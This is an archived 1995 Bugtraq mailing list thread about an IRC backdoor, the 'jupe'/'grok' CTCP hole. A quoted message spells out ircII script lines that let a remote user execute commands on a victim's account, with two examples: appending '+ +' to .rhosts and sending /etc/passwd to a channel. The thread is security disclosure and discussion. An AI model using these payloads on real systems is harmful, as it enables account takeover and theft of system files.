Bugtraq mailing list archives

Re: IRC Security Loophole

From: zitz () infinity ivdev com (Silicon Avatar)
Date: Sat, 4 Feb 1995 00:43:21 -0600 (CST)


On Fri, 3 Feb 1995, Kernel Panic wrote:

On Fri, 3 Feb 1995, Silicon Avatar wrote:

On Fri, 3 Feb 1995, Lorna Leong wrote:
If you are talking about the "jupe" or "grok" hole.  It was temporary, and
merely hacked version of the client floating around at "trusted" sites.

To my knowledge, these "hacks" have been removed and are no longer a threat
(unless someone is propogating these older clients.)

Simply put, you could "CTCP grok [command]" (CTCP being a method of
communication over IRC) someone, and have that command executed,
unknowingly, off the account.


No, IRC holes are a more serious threat than you give then credit for. 
For example, if I were to add to a script (or better yet make someone 
type) the following:

/on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client.
from this, you can do:

/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

Theres more to IRC backdoors than making people say stupid stuff on a 
channel. I hope this example clears that up a little.


I never said the hole was limited to saying something on the channel.  I
said that command could be executed off that account.  The *known* hole that
was cert-released was what I described.  What you describe is a lackage of
knowledge in general ircII-scripting causing people to use other, unknown
scripts.  Often times, these scripts have their own backholes ...  But this
is not a hole generated at a "guaranteed" site.

 /----------------------------------------------------------------------\
<> Stephan K. Zitz                  <>  My mind is my best friend...    <>
<> zitz () infinity ivdev com          <>   And my worst enemy... GABBPUY! <>
<>        Integrated Visions -- Watch out, is on its way....            <>
 \======================================================================/
 GCS/M d-- p c++++ l+++ u++ e+ m-(++) s !n h++ f(++)* !g w+++ t+++ r+ y+(*)

Current thread:

Re: MAGIC PIDs (was Re: magic??) robert owen thomas (Feb 02)
- Re: MAGIC PIDs (was Re: magic??) Neil Woods (Feb 02)
- IRC Security Loophole Lorna Leong (Feb 02)
  - Re: IRC Security Loophole Mark (Feb 03)
  - Re: IRC Security Loophole Silicon Avatar (Feb 03)
    - Re: IRC Security Loophole Kernel Panic (Feb 03)
    - Re: IRC Security Loophole Silicon Avatar (Feb 03)
- port checking under solaris 2.3? James W. Abendschan (Feb 02)